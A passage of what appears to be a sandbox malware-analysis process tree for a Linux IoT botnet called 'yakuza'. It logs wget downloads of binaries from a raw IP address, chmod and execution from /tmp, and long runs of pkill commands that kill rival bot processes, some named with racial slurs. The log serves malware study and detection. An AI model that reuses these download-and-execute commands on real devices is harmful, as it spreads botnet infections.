      pkill -9 19ju3d
      4⤵
      PID:2113
  - - /bin/busybox
      busybox pkill -9 19ju3d
      4⤵
      PID:2115
- - /bin/sh
    sh -c "pkill -9 SORAojkf120 || busybox pkill -9 SORAojkf120"
    3⤵
    PID:2120
  - - /usr/bin/pkill
      pkill -9 SORAojkf120
      4⤵
      PID:2123
  - - /bin/busybox
      busybox pkill -9 SORAojkf120
      4⤵
      PID:2125
- - /bin/sh
    sh -c "pkill -9 hehahejeje92 || busybox pkill -9 hehahejeje92"
    3⤵
    PID:2127
  - - /usr/bin/pkill
      pkill -9 hehahejeje92
      4⤵
      Reads runtime system information
      PID:2130
  - - /bin/busybox
      busybox pkill -9 hehahejeje92
      4⤵
      PID:2133
- - /bin/sh
    sh -c "pkill -9 2U2JDJA901F91 || busybox pkill -9 2U2JDJA901F91"
    3⤵
    PID:2137
  - - /usr/bin/pkill
      pkill -9 2U2JDJA901F91
      4⤵
      PID:2139
  - - /bin/busybox
      busybox pkill -9 2U2JDJA901F91
      4⤵
      PID:2143
- - /bin/sh
    sh -c "pkill -9 SlaVLav12 || busybox pkill -9 SlaVLav12"
    3⤵
    PID:2146
  - - /usr/bin/pkill
      pkill -9 SlaVLav12
      4⤵
      PID:2149
  - - /bin/busybox
      busybox pkill -9 SlaVLav12
      4⤵
      PID:2153
- - /bin/sh
    sh -c "pkill -9 helpmedaddthhhhh || busybox pkill -9 helpmedaddthhhhh"
    3⤵
    PID:2154
  - - /usr/bin/pkill
      pkill -9 helpmedaddthhhhh
      4⤵
      Reads runtime system information
      PID:2158
  - - /bin/busybox
      busybox pkill -9 helpmedaddthhhhh
      4⤵
      PID:2161
- - /bin/sh
    sh -c "pkill -9 2wgg9qphbq || busybox pkill -9 2wgg9qphbq"
    3⤵
    PID:2163
  - - /usr/bin/pkill
      pkill -9 2wgg9qphbq
      4⤵
      PID:2167
  - - /bin/busybox
      busybox pkill -9 2wgg9qphbq
      4⤵
      PID:2170
- - /bin/sh
    sh -c "pkill -9 Slav3Th3seD3vices || busybox pkill -9 Slav3Th3seD3vices"
    3⤵
    PID:2173
  - - /usr/bin/pkill
      pkill -9 Slav3Th3seD3vices
      4⤵
      Reads runtime system information
      PID:2177
  - - /bin/busybox
      busybox pkill -9 Slav3Th3seD3vices
      4⤵
      PID:2180
- - /bin/sh
    sh -c "pkill -9 hzSmYZjYMQ || busybox pkill -9 hzSmYZjYMQ"
    3⤵
    PID:2183
  - - /usr/bin/pkill
      pkill -9 hzSmYZjYMQ
      4⤵
      Reads CPU attributes
      PID:2186
  - - /bin/busybox
      busybox pkill -9 hzSmYZjYMQ
      4⤵
      PID:2189
- - /bin/sh
    sh -c "pkill -9 5Gbf || busybox pkill -9 5Gbf"
    3⤵
    PID:2193
  - - /usr/bin/pkill
      pkill -9 5Gbf
      4⤵
      PID:2195
  - - /bin/busybox
      busybox pkill -9 5Gbf
      4⤵
      PID:2198
- - /bin/sh
    sh -c "pkill -9 SoRAxD123LOL || busybox pkill -9 SoRAxD123LOL"
    3⤵
    PID:2201
  - - /usr/bin/pkill
      pkill -9 SoRAxD123LOL
      4⤵
      PID:2204
  - - /bin/busybox
      busybox pkill -9 SoRAxD123LOL
      4⤵
      PID:2205
- - /bin/sh
    sh -c "pkill -9 iaGv || busybox pkill -9 iaGv"
    3⤵
    PID:2210
  - - /usr/bin/pkill
      pkill -9 iaGv
      4⤵
      PID:2213
  - - /bin/busybox
      busybox pkill -9 iaGv
      4⤵
      PID:2215
- - /bin/sh
    sh -c "pkill -9 5aA3 || busybox pkill -9 5aA3"
    3⤵
    PID:2218
  - - /usr/bin/pkill
      pkill -9 5aA3
      4⤵
      PID:2220
  - - /bin/busybox
      busybox pkill -9 5aA3
      4⤵
      PID:2223
- - /bin/sh
    sh -c "pkill -9 SoRAxD420LOL || busybox pkill -9 SoRAxD420LOL"
    3⤵
    PID:2227
  - - /usr/bin/pkill
      pkill -9 SoRAxD420LOL
      4⤵
      PID:2229
  - - /bin/busybox
      busybox pkill -9 SoRAxD420LOL
      4⤵
      PID:2232
- - /bin/sh
    sh -c "pkill -9 insomni || busybox pkill -9 insomni"
    3⤵
    PID:2235
  - - /usr/bin/pkill
      pkill -9 insomni
      4⤵
      PID:2240
  - - /bin/busybox
      busybox pkill -9 insomni
      4⤵
      PID:2243
- - /bin/sh
    sh -c "pkill -9 640277 || busybox pkill -9 640277"
    3⤵
    PID:2245
  - - /usr/bin/pkill
      pkill -9 640277
      4⤵
      PID:2247
  - - /bin/busybox
      busybox pkill -9 640277
      4⤵
      PID:2252
- - /bin/sh
    sh -c "pkill -9 SoraBeReppin1337 || busybox pkill -9 SoraBeReppin1337"
    3⤵
    PID:2255
  - - /usr/bin/pkill
      pkill -9 SoraBeReppin1337
      4⤵
      Reads runtime system information
      PID:2256
  - - /bin/busybox
      busybox pkill -9 SoraBeReppin1337
      4⤵
      PID:2260
- - /bin/sh
    sh -c "pkill -9 ipcamCache || busybox pkill -9 ipcamCache"
    3⤵
    - System Network Configuration Discovery
    PID:2262
  - - /usr/bin/pkill
      pkill -9 ipcamCache
      4⤵
      Reads runtime system information
      System Network Configuration Discovery
      PID:2263
  - - /bin/busybox
      busybox pkill -9 ipcamCache
      4⤵
      System Network Configuration Discovery
      PID:2270
- - /bin/sh
    sh -c "pkill -9 66tlGg9Q || busybox pkill -9 66tlGg9Q"
    3⤵
    PID:2273
  - - /usr/bin/pkill
      pkill -9 66tlGg9Q
      4⤵
      PID:2276
  - - /bin/busybox
      busybox pkill -9 66tlGg9Q
      4⤵
      PID:2279
- - /bin/sh
    sh -c "pkill -9 T || busybox pkill -9 T"
    3⤵
    PID:2282
  - - /usr/bin/pkill
      pkill -9 T
      4⤵
      PID:2285
  - - /bin/busybox
      busybox pkill -9 T
      4⤵
      PID:2287
- - /bin/sh
    sh -c "pkill -9 jUYfouyf87 || busybox pkill -9 jUYfouyf87"
    3⤵
    PID:2290
  - - /usr/bin/pkill
      pkill -9 jUYfouyf87
      4⤵
      PID:2293
  - - /bin/busybox
      busybox pkill -9 jUYfouyf87
      4⤵
      PID:2296
- - /bin/sh
    sh -c "pkill -9 6ke3 || busybox pkill -9 6ke3"
    3⤵
    PID:2299
  - - /usr/bin/pkill
      pkill -9 6ke3
      4⤵
      PID:2303
  - - /bin/busybox
      busybox pkill -9 6ke3
      4⤵
      PID:2304
- - /bin/sh
    sh -c "pkill -9 TOKYO3 || busybox pkill -9 TOKYO3"
    3⤵
    PID:2307
  - - /usr/bin/pkill
      pkill -9 TOKYO3
      4⤵
      PID:2310
  - - /bin/busybox
      busybox pkill -9 TOKYO3
      4⤵
      PID:2313
- - /bin/sh
    sh -c "pkill -9 lyEeaXul2dULCVxh || busybox pkill -9 lyEeaXul2dULCVxh"
    3⤵
    PID:2316
  - - /usr/bin/pkill
      pkill -9 lyEeaXul2dULCVxh
      4⤵
      Reads CPU attributes
      PID:2319
  - - /bin/busybox
      busybox pkill -9 lyEeaXul2dULCVxh
      4⤵
      PID:2322
- - /bin/sh
    sh -c "pkill -9 93OfjHZ2z || busybox pkill -9 93OfjHZ2z"
    3⤵
    PID:2328
  - - /usr/bin/pkill
      pkill -9 93OfjHZ2z
      4⤵
      PID:2330
  - - /bin/busybox
      busybox pkill -9 93OfjHZ2z
      4⤵
      PID:2332
- - /bin/sh
    sh -c "pkill -9 TY2gD6MZvKc7KU6r || busybox pkill -9 TY2gD6MZvKc7KU6r"
    3⤵
    PID:2334
  - - /usr/bin/pkill
      pkill -9 TY2gD6MZvKc7KU6r
      4⤵
      PID:2337
  - - /bin/busybox
      busybox pkill -9 TY2gD6MZvKc7KU6r
      4⤵
      PID:2340
- - /bin/sh
    sh -c "pkill -9 mMkiy6f87l || busybox pkill -9 mMkiy6f87l"
    3⤵
    PID:2343
  - - /usr/bin/pkill
      pkill -9 mMkiy6f87l
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:2346
  - - /bin/busybox
      busybox pkill -9 mMkiy6f87l
      4⤵
      PID:2349
- - /bin/sh
    sh -c "pkill -9 A023UU4U24UIU || busybox pkill -9 A023UU4U24UIU"
    3⤵
    PID:2354
  - - /usr/bin/pkill
      pkill -9 A023UU4U24UIU
      4⤵
      PID:2355
  - - /bin/busybox
      busybox pkill -9 A023UU4U24UIU
      4⤵
      PID:2360
- - /bin/sh
    sh -c "pkill -9 TheWeeknd || busybox pkill -9 TheWeeknd"
    3⤵
    PID:2362
  - - /usr/bin/pkill
      pkill -9 TheWeeknd
      4⤵
      PID:2363
  - - /bin/busybox
      busybox pkill -9 TheWeeknd
      4⤵
      PID:2367
- - /bin/sh
    sh -c "pkill -9 mioribitches || busybox pkill -9 mioribitches"
    3⤵
    PID:2372
  - - /usr/bin/pkill
      pkill -9 mioribitches
      4⤵
      Reads runtime system information
      PID:2373
  - - /bin/busybox
      busybox pkill -9 mioribitches
      4⤵
      PID:2378
- - /bin/sh
    sh -c "pkill -9 A5p9 || busybox pkill -9 A5p9"
    3⤵
    PID:2382
  - - /usr/bin/pkill
      pkill -9 A5p9
      4⤵
      PID:2384
  - - /bin/busybox
      busybox pkill -9 A5p9
      4⤵
      PID:2387
- - /bin/sh
    sh -c "pkill -9 TheWeeknds || busybox pkill -9 TheWeeknds"
    3⤵
    PID:2388
  - - /usr/bin/pkill
      pkill -9 TheWeeknds
      4⤵
      PID:2389
  - - /bin/busybox
      busybox pkill -9 TheWeeknds
      4⤵
      PID:2396
- - /bin/sh
    sh -c "pkill -9 mnblkjpoi || busybox pkill -9 mnblkjpoi"
    3⤵
    PID:2399
  - - /usr/bin/pkill
      pkill -9 mnblkjpoi
      4⤵
      PID:2400
  - - /bin/busybox
      busybox pkill -9 mnblkjpoi
      4⤵
      PID:2405
- - /bin/sh
    sh -c "pkill -9 AbAd || busybox pkill -9 AbAd"
    3⤵
    PID:2410
  - - /usr/bin/pkill
      pkill -9 AbAd
      4⤵
      PID:2411
  - - /bin/busybox
      busybox pkill -9 AbAd
      4⤵
      PID:2412
- - /bin/sh
    sh -c "pkill -9 Tokyos || busybox pkill -9 Tokyos"
    3⤵
    PID:2416
  - - /usr/bin/pkill
      pkill -9 Tokyos
      4⤵
      PID:2419
  - - /bin/busybox
      busybox pkill -9 Tokyos
      4⤵
      PID:2422
- - /bin/sh
    sh -c "pkill -9 neb || busybox pkill -9 neb"
    3⤵
    PID:2425
  - - /usr/bin/pkill
      pkill -9 neb
      4⤵
      PID:2428
  - - /bin/busybox
      busybox pkill -9 neb
      4⤵
      PID:2432
- - /bin/sh
    sh -c "pkill -9 Akiru || busybox pkill -9 Akiru"
    3⤵
    PID:2435
  - - /usr/bin/pkill
      pkill -9 Akiru
      4⤵
      PID:2438
  - - /bin/busybox
      busybox pkill -9 Akiru
      4⤵
      PID:2441
- - /bin/sh
    sh -c "pkill -9 U8inTz || busybox pkill -9 U8inTz"
    3⤵
    PID:2444
  - - /usr/bin/pkill
      pkill -9 U8inTz
      4⤵
      PID:2447
  - - /bin/busybox
      busybox pkill -9 U8inTz
      4⤵
      PID:2449
- - /bin/sh
    sh -c "pkill -9 netstats || busybox pkill -9 netstats"
    3⤵
    PID:2452
  - - /usr/bin/pkill
      pkill -9 netstats
      4⤵
      PID:2455
  - - /bin/busybox
      busybox pkill -9 netstats
      4⤵
      PID:2458
- - /bin/sh
    sh -c "pkill -9 Alex || busybox pkill -9 Alex"
    3⤵
    PID:2461
  - - /usr/bin/pkill
      pkill -9 Alex
      4⤵
      PID:2463
  - - /bin/busybox
      busybox pkill -9 Alex
      4⤵
      PID:2466
- - /bin/sh
    sh -c "pkill -9 W9RCAKM20T || busybox pkill -9 W9RCAKM20T"
    3⤵
    PID:2469
  - - /usr/bin/pkill
      pkill -9 W9RCAKM20T
      4⤵
      PID:2472
  - - /bin/busybox
      busybox pkill -9 W9RCAKM20T
      4⤵
      PID:2475
- - /bin/sh
    sh -c "pkill -9 newnetword || busybox pkill -9 newnetword"
    3⤵
    PID:2479
  - - /usr/bin/pkill
      pkill -9 newnetword
      4⤵
      Reads runtime system information
      PID:2481
  - - /bin/busybox
      busybox pkill -9 newnetword
      4⤵
      PID:2485
- - /bin/sh
    sh -c "pkill -9 Ayo215 || busybox pkill -9 Ayo215"
    3⤵
    PID:2487
  - - /usr/bin/pkill
      pkill -9 Ayo215
      4⤵
      Reads runtime system information
      PID:2488
  - - /bin/busybox
      busybox pkill -9 Ayo215
      4⤵
      PID:2495
- - /bin/sh
    sh -c "pkill -9 Word || busybox pkill -9 Word"
    3⤵
    PID:2498
  - - /usr/bin/pkill
      pkill -9 Word
      4⤵
      PID:2501
  - - /bin/busybox
      busybox pkill -9 Word
      4⤵
      PID:2504
- - /bin/sh
    sh -c "pkill -9 nloads || busybox pkill -9 nloads"
    3⤵
    PID:2508
  - - /usr/bin/pkill
      pkill -9 nloads
      4⤵
      PID:2509
  - - /bin/busybox
      busybox pkill -9 nloads
      4⤵
      PID:2512
- - /bin/sh
    sh -c "pkill -9 BAdAsV || busybox pkill -9 BAdAsV"
    3⤵
    PID:2514
  - - /usr/bin/pkill
      pkill -9 BAdAsV
      4⤵
      Reads CPU attributes
      PID:2517
  - - /bin/busybox
      busybox pkill -9 BAdAsV
      4⤵
      PID:2520
- - /bin/sh
    sh -c "pkill -9 Wordmane || busybox pkill -9 Wordmane"
    3⤵
    PID:2523
  - - /usr/bin/pkill
      pkill -9 Wordmane
      4⤵
      Reads CPU attributes
      PID:2527
  - - /bin/busybox
      busybox pkill -9 Wordmane
      4⤵
      PID:2530
- - /bin/sh
    sh -c "pkill -9 notyakuzaa || busybox pkill -9 notyakuzaa"
    3⤵
    PID:2532
  - - /usr/bin/pkill
      pkill -9 notyakuzaa
      4⤵
      Reads runtime system information
      PID:2535
  - - /bin/busybox
      busybox pkill -9 notyakuzaa
      4⤵
      PID:2539
- - /bin/sh
    sh -c "pkill -9 Belch || busybox pkill -9 Belch"
    3⤵
    PID:2542
  - - /usr/bin/pkill
      pkill -9 Belch
      4⤵
      PID:2543
  - - /bin/busybox
      busybox pkill -9 Belch
      4⤵
      PID:2548
- - /bin/sh
    sh -c "pkill -9 Wordnets || busybox pkill -9 Wordnets"
    3⤵
    PID:2552
  - - /usr/bin/pkill
      pkill -9 Wordnets
      4⤵
      PID:2555
  - - /bin/busybox
      busybox pkill -9 Wordnets
      4⤵
      PID:2556
- - /bin/sh
    sh -c "pkill -9 obp || busybox pkill -9 obp"
    3⤵
    PID:2561
  - - /usr/bin/pkill
      pkill -9 obp
      4⤵
      PID:2562
- /bin/rm
  rm -rf yakuza.i686
  2⤵
  PID:1557
- /usr/bin/wget
  wget http://79.23.237.23/yakuza.ppc
  2⤵
  - Writes file to tmp directory
  PID:1562
- /bin/chmod
  chmod +x yakuza.ppc
  2⤵
  - File and Directory Permissions Modification
  PID:1567
- /tmp/yakuza.ppc
  ./yakuza.ppc
  2⤵
  PID:1568
- /bin/rm
  rm -rf yakuza.ppc
  2⤵
  PID:1570
- /usr/bin/wget
  wget http://79.23.237.23/yakuza.i586
  2⤵
  - Writes file to tmp directory
  PID:1571
- /bin/chmod
  chmod +x yakuza.i586
  2⤵
  - File and Directory Permissions Modification
  PID:1572
- /tmp/yakuza.i586
  ./yakuza.i586
  2⤵
  PID:1573
- - /bin/sh
    sh -c "pkill -9 902i13 || busybox pkill -9 902i13"
    3⤵
    PID:1578
  - - /usr/bin/pkill
      pkill -9 902i13
      4⤵
      PID:1579
  - - /bin/busybox
      busybox pkill -9 902i13
      4⤵
      PID:1581
- - /bin/sh
    sh -c "pkill -9 BzSxLxBxeY || busybox pkill -9 BzSxLxBxeY"
    3⤵
    PID:1598
  - - /usr/bin/pkill
      pkill -9 BzSxLxBxeY
      4⤵
      PID:1599
  - - /bin/busybox
      busybox pkill -9 BzSxLxBxeY
      4⤵
      PID:1600
- - /bin/sh
    sh -c "pkill -9 HOHO-LUGO7 || busybox pkill -9 HOHO-LUGO7"
    3⤵
    PID:1617
  - - /usr/bin/pkill
      pkill -9 HOHO-LUGO7
      4⤵
      PID:1618
  - - /bin/busybox
      busybox pkill -9 HOHO-LUGO7
      4⤵
      PID:1619
- - /bin/sh
    sh -c "pkill -9 HOHO-U79OL || busybox pkill -9 HOHO-U79OL"
    3⤵
    PID:1630
  - - /usr/bin/pkill
      pkill -9 HOHO-U79OL
      4⤵
      PID:1631
  - - /bin/busybox
      busybox pkill -9 HOHO-U79OL
      4⤵
      PID:1632
- - /bin/sh
    sh -c "pkill -9 JuYfouyf87 || busybox pkill -9 JuYfouyf87"
    3⤵
    PID:1639
  - - /usr/bin/pkill
      pkill -9 JuYfouyf87
      4⤵
      PID:1640
  - - /bin/busybox
      busybox pkill -9 JuYfouyf87
      4⤵
      PID:1641
- - /bin/sh
    sh -c "pkill -9 NiGGeR69xd || busybox pkill -9 NiGGeR69xd"
    3⤵
    PID:1648
  - - /usr/bin/pkill
      pkill -9 NiGGeR69xd
      4⤵
      PID:1649
  - - /bin/busybox
      busybox pkill -9 NiGGeR69xd
      4⤵
      PID:1650
- - /bin/sh
    sh -c "pkill -9 SO190Ij1X || busybox pkill -9 SO190Ij1X"
    3⤵
    PID:1657
  - - /usr/bin/pkill
      pkill -9 SO190Ij1X
      4⤵
      Reads CPU attributes
      PID:1658
  - - /bin/busybox
      busybox pkill -9 SO190Ij1X
      4⤵
      PID:1659
- - /bin/sh
    sh -c "pkill -9 LOLKIKEEEDDE || busybox pkill -9 LOLKIKEEEDDE"
    3⤵
    PID:1666
  - - /usr/bin/pkill
      pkill -9 LOLKIKEEEDDE
      4⤵
      PID:1667
  - - /bin/busybox
      busybox pkill -9 LOLKIKEEEDDE
      4⤵
      PID:1670
- - /bin/sh
    sh -c "pkill -9 ekjheory98e || busybox pkill -9 ekjheory98e"
    3⤵
    PID:1675
  - - /usr/bin/pkill
      pkill -9 ekjheory98e
      4⤵
      PID:1676
  - - /bin/busybox
      busybox pkill -9 ekjheory98e
      4⤵
      PID:1679
- - /bin/sh
    sh -c "pkill -9 scansh4 || busybox pkill -9 scansh4"
    3⤵
    PID:1684
  - - /usr/bin/pkill
      pkill -9 scansh4
      4⤵
      PID:1685
  - - /bin/busybox
      busybox pkill -9 scansh4
      4⤵
      PID:1688
- - /bin/sh
    sh -c "pkill -9 MDMA || busybox pkill -9 MDMA"
    3⤵
    PID:1693
  - - /usr/bin/pkill
      pkill -9 MDMA
      4⤵
      PID:1694
  - - /bin/busybox
      busybox pkill -9 MDMA
      4⤵
      PID:1697
- - /bin/sh
    sh -c "pkill -9 fdevalvex || busybox pkill -9 fdevalvex"
    3⤵
    PID:1702
  - - /usr/bin/pkill
      pkill -9 fdevalvex
      4⤵
      PID:1703
  - - /bin/busybox
      busybox pkill -9 fdevalvex
      4⤵
      PID:1707
- - /bin/sh
    sh -c "pkill -9 scanspc || busybox pkill -9 scanspc"
    3⤵
    PID:1713
  - - /usr/bin/pkill
      pkill -9 scanspc
      4⤵
      PID:1714
  - - /bin/busybox
      busybox pkill -9 scanspc
      4⤵
      PID:1716
- - /bin/sh
    sh -c "pkill -9 MELTEDNINJAREALZ || busybox pkill -9 MELTEDNINJAREALZ"
    3⤵
    PID:1722
  - - /usr/bin/pkill
      pkill -9 MELTEDNINJAREALZ
      4⤵
      PID:1723
  - - /bin/busybox
      busybox pkill -9 MELTEDNINJAREALZ
      4⤵
      PID:1726
- - /bin/sh
    sh -c "pkill -9 flexsonskids || busybox pkill -9 flexsonskids"
    3⤵
    PID:1731
  - - /usr/bin/pkill
      pkill -9 flexsonskids
      4⤵
      PID:1732
  - - /bin/busybox
      busybox pkill -9 flexsonskids
      4⤵
      PID:1735
- - /bin/sh
    sh -c "pkill -9 scanx86 || busybox pkill -9 scanx86"
    3⤵
    PID:1738
  - - /usr/bin/pkill
      pkill -9 scanx86
      4⤵
      PID:1739
  - - /bin/busybox
      busybox pkill -9 scanx86
      4⤵
      PID:1745
- - /bin/sh
    sh -c "pkill -9 MISAKI-U79OL || busybox pkill -9 MISAKI-U79OL"
    3⤵
    PID:1747
  - - /usr/bin/pkill
      pkill -9 MISAKI-U79OL
      4⤵
      Reads runtime system information
      PID:1748
  - - /bin/busybox
      busybox pkill -9 MISAKI-U79OL
      4⤵
      PID:1753
- - /bin/sh
    sh -c "pkill -9 foAxi102kxe || busybox pkill -9 foAxi102kxe"
    3⤵
    PID:1758
  - - /usr/bin/pkill
      pkill -9 foAxi102kxe
      4⤵
      PID:1759
  - - /bin/busybox
      busybox pkill -9 foAxi102kxe
      4⤵
      PID:1763
- - /bin/sh
    sh -c "pkill -9 swodjwodjwoj || busybox pkill -9 swodjwodjwoj"
    3⤵
    PID:1767
  - - /usr/bin/pkill
      pkill -9 swodjwodjwoj
      4⤵
      PID:1768
  - - /bin/busybox
      busybox pkill -9 swodjwodjwoj
      4⤵
      PID:1772
- - /bin/sh
    sh -c "pkill -9 MmKiy7f87l || busybox pkill -9 MmKiy7f87l"
    3⤵
    PID:1774
  - - /usr/bin/pkill
      pkill -9 MmKiy7f87l
      4⤵
      PID:1777
  - - /bin/busybox
      busybox pkill -9 MmKiy7f87l
      4⤵
      PID:1781
- - /bin/sh
    sh -c "pkill -9 freecookiex86 || busybox pkill -9 freecookiex86"
    3⤵
    PID:1784
  - - /usr/bin/pkill
      pkill -9 freecookiex86
      4⤵
      PID:1787
  - - /bin/busybox
      busybox pkill -9 freecookiex86
      4⤵
      PID:1790
- - /bin/sh
    sh -c "pkill -9 sysgpu || busybox pkill -9 sysgpu"
    3⤵
    PID:1794
  - - /usr/bin/pkill
      pkill -9 sysgpu
      4⤵
      PID:1796
  - - /bin/busybox
      busybox pkill -9 sysgpu
      4⤵
      PID:1799
- - /bin/sh
    sh -c "pkill -9 NiGGeR69xd || busybox pkill -9 NiGGeR69xd"
    3⤵
    PID:1801
  - - /usr/bin/pkill
      pkill -9 NiGGeR69xd
      4⤵
      Reads runtime system information
      PID:1805
  - - /bin/busybox
      busybox pkill -9 NiGGeR69xd
      4⤵
      PID:1807
- - /bin/sh
    sh -c "pkill -9 frgege || busybox pkill -9 frgege"
    3⤵
    PID:1812
  - - /usr/bin/pkill
      pkill -9 frgege
      4⤵
      Reads runtime system information
      PID:1814
  - - /bin/busybox
      busybox pkill -9 frgege
      4⤵
      PID:1818
- - /bin/sh
    sh -c "pkill -9 sysupdater || busybox pkill -9 sysupdater"
    3⤵
    PID:1822
  - - /usr/bin/pkill
      pkill -9 sysupdater
      4⤵
      PID:1824
  - - /bin/busybox
      busybox pkill -9 sysupdater
      4⤵
      PID:1827
- - /bin/sh
    sh -c "pkill -9 0DnAzepd || busybox pkill -9 0DnAzepd"
    3⤵
    PID:1830
  - - /usr/bin/pkill
      pkill -9 0DnAzepd
      4⤵
      PID:1833
  - - /bin/busybox
      busybox pkill -9 0DnAzepd
      4⤵
      PID:1835
- - /bin/sh
    sh -c "pkill -9 NiGGeRD0nks69 || busybox pkill -9 NiGGeRD0nks69"
    3⤵
    PID:1839
  - - /usr/bin/pkill
      pkill -9 NiGGeRD0nks69
      4⤵
      PID:1844
  - - /bin/busybox
      busybox pkill -9 NiGGeRD0nks69
      4⤵
      PID:1846
- - /bin/sh
    sh -c "pkill -9 frgreu || busybox pkill -9 frgreu"
    3⤵
    PID:1848
  - - /usr/bin/pkill
      pkill -9 frgreu
      4⤵
      Reads CPU attributes
      PID:1851
  - - /bin/busybox
      busybox pkill -9 frgreu
      4⤵
      PID:1855
- - /bin/sh
    sh -c "pkill -9 telnetd || busybox pkill -9 telnetd"
    3⤵
    PID:1857
  - - /usr/bin/pkill
      pkill -9 telnetd
      4⤵
      PID:1858
  - - /bin/busybox
      busybox pkill -9 telnetd
      4⤵
      PID:1865
- - /bin/sh
    sh -c "pkill -9 0x766f6964 || busybox pkill -9 0x766f6964"
    3⤵
    PID:1868
  - - /usr/bin/pkill
      pkill -9 0x766f6964
      4⤵
      PID:1871
  - - /bin/busybox
      busybox pkill -9 0x766f6964
      4⤵
      PID:1872
- - /bin/sh
    sh -c "pkill -9 NiGGeRd0nks1337 || busybox pkill -9 NiGGeRd0nks1337"
    3⤵
    PID:1876
  - - /usr/bin/pkill
      pkill -9 NiGGeRd0nks1337
      4⤵
      Reads runtime system information
      PID:1879
  - - /bin/busybox
      busybox pkill -9 NiGGeRd0nks1337
      4⤵
      PID:1883
- - /bin/sh
    sh -c "pkill -9 gaft || busybox pkill -9 gaft"
    3⤵
    PID:1888
  - - /usr/bin/pkill
      pkill -9 gaft
      4⤵
      Reads CPU attributes
      PID:1889
  - - /bin/busybox
      busybox pkill -9 gaft
      4⤵
      PID:1891
- - /bin/sh
    sh -c "pkill -9 urasgbsigboa || busybox pkill -9 urasgbsigboa"
    3⤵
    PID:1895
  - - /usr/bin/pkill
      pkill -9 urasgbsigboa
      4⤵
      PID:1898
  - - /bin/busybox
      busybox pkill -9 urasgbsigboa
      4⤵
      PID:1899
- - /bin/sh
    sh -c "pkill -9 120i3UI49 || busybox pkill -9 120i3UI49"
    3⤵
    PID:1902
  - - /usr/bin/pkill
      pkill -9 120i3UI49
      4⤵
      PID:1903
  - - /bin/busybox
      busybox pkill -9 120i3UI49
      4⤵
      PID:1910
- - /bin/sh
    sh -c "pkill -9 OaF3 || busybox pkill -9 OaF3"
    3⤵
    PID:1913
  - - /usr/bin/pkill
      pkill -9 OaF3
      4⤵
      PID:1916
  - - /bin/busybox
      busybox pkill -9 OaF3
      4⤵
      PID:1917
- - /bin/sh
    sh -c "pkill -9 geae || busybox pkill -9 geae"
    3⤵
    PID:1922
  - - /usr/bin/pkill
      pkill -9 geae
      4⤵
      PID:1925
  - - /bin/busybox
      busybox pkill -9 geae
      4⤵
      PID:1927
- - /bin/sh
    sh -c "pkill -9 vaiolmao || busybox pkill -9 vaiolmao"
    3⤵
    PID:1930
  - - /usr/bin/pkill
      pkill -9 vaiolmao
      4⤵
      Reads runtime system information
      PID:1932
  - - /bin/busybox
      busybox pkill -9 vaiolmao
      4⤵
      PID:1935
- - /bin/sh
    sh -c "pkill -9 123123a || busybox pkill -9 123123a"
    3⤵
    PID:1939
  - - /usr/bin/pkill
      pkill -9 123123a
      4⤵
      PID:1941
  - - /bin/busybox
      busybox pkill -9 123123a
      4⤵
      PID:1946
- - /bin/sh
    sh -c "pkill -9 Ofurain0n4H34D || busybox pkill -9 Ofurain0n4H34D"
    3⤵
    PID:1948
  - - /usr/bin/pkill
      pkill -9 Ofurain0n4H34D
      4⤵
      PID:1949
  - - /bin/busybox
      busybox pkill -9 Ofurain0n4H34D
      4⤵
      PID:1954
- - /bin/sh
    sh -c "pkill -9 ggTrex || busybox pkill -9 ggTrex"
    3⤵
    PID:1957
  - - /usr/bin/pkill
      pkill -9 ggTrex
      4⤵
      PID:1959
  - - /bin/busybox
      busybox pkill -9 ggTrex
      4⤵
      PID:1963
- - /bin/sh
    sh -c "pkill -9 wasads || busybox pkill -9 wasads"
    3⤵
    PID:1967
  - - /usr/bin/pkill
      pkill -9 wasads
      4⤵
      PID:1968
  - - /bin/busybox
      busybox pkill -9 wasads
      4⤵
      PID:1972
- - /bin/sh
    sh -c "pkill -9 1293194hjXD || busybox pkill -9 1293194hjXD"
    3⤵
    PID:1976
  - - /usr/bin/pkill
      pkill -9 1293194hjXD
      4⤵
      PID:1978
  - - /bin/busybox
      busybox pkill -9 1293194hjXD
      4⤵
      PID:1982
- - /bin/sh
    sh -c "pkill -9 OthLaLosn || busybox pkill -9 OthLaLosn"
    3⤵
    PID:1985
  - - /usr/bin/pkill
      pkill -9 OthLaLosn
      4⤵
      Reads CPU attributes
      PID:1988
  - - /bin/busybox
      busybox pkill -9 OthLaLosn
      4⤵
      PID:1991
- - /bin/sh
    sh -c "pkill -9 ggt || busybox pkill -9 ggt"
    3⤵
    PID:1994
  - - /usr/bin/pkill
      pkill -9 ggt
      4⤵
      PID:1997
  - - /bin/busybox
      busybox pkill -9 ggt
      4⤵
      PID:1998
- - /bin/sh
    sh -c "pkill -9 wget-log || busybox pkill -9 wget-log"
    3⤵
    PID:2002
  - - /usr/bin/pkill
      pkill -9 wget-log
      4⤵
      PID:2005
  - - /bin/busybox
      busybox pkill -9 wget-log
      4⤵
      PID:2007
- - /bin/sh
    sh -c "pkill -9 1337SoraLOADER || busybox pkill -9 1337SoraLOADER"
    3⤵
    PID:2011
  - - /usr/bin/pkill
      pkill -9 1337SoraLOADER
      4⤵
      PID:2013
  - - /bin/busybox
      busybox pkill -9 1337SoraLOADER
      4⤵
      PID:2016
- - /bin/sh
    sh -c "pkill -9 SAIAKINA || busybox pkill -9 SAIAKINA"
    3⤵
    PID:2019
  - - /usr/bin/pkill
      pkill -9 SAIAKINA
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:2020
  - - /bin/busybox
      busybox pkill -9 SAIAKINA
      4⤵
      PID:2025
- - /bin/sh
    sh -c "pkill -9 ggtq || busybox pkill -9 ggtq"
    3⤵
    PID:2028
  - - /usr/bin/pkill
      pkill -9 ggtq
      4⤵
      PID:2031
  - - /bin/busybox
      busybox pkill -9 ggtq
      4⤵
      PID:2036
- - /bin/sh
    sh -c "pkill -9 1378bfp919GRB1Q2 || busybox pkill -9 1378bfp919GRB1Q2"
    3⤵
    PID:2037
  - - /usr/bin/pkill
      pkill -9 1378bfp919GRB1Q2
      4⤵
      PID:2041
  - - /bin/busybox
      busybox pkill -9 1378bfp919GRB1Q2
      4⤵
      PID:2043
- - /bin/sh
    sh -c "pkill -9 SAIAKUSO || busybox pkill -9 SAIAKUSO"
    3⤵
    PID:2050
  - - /usr/bin/pkill
      pkill -9 SAIAKUSO
      4⤵
      PID:2051
  - - /bin/busybox
      busybox pkill -9 SAIAKUSO
      4⤵
      PID:2053
- - /bin/sh
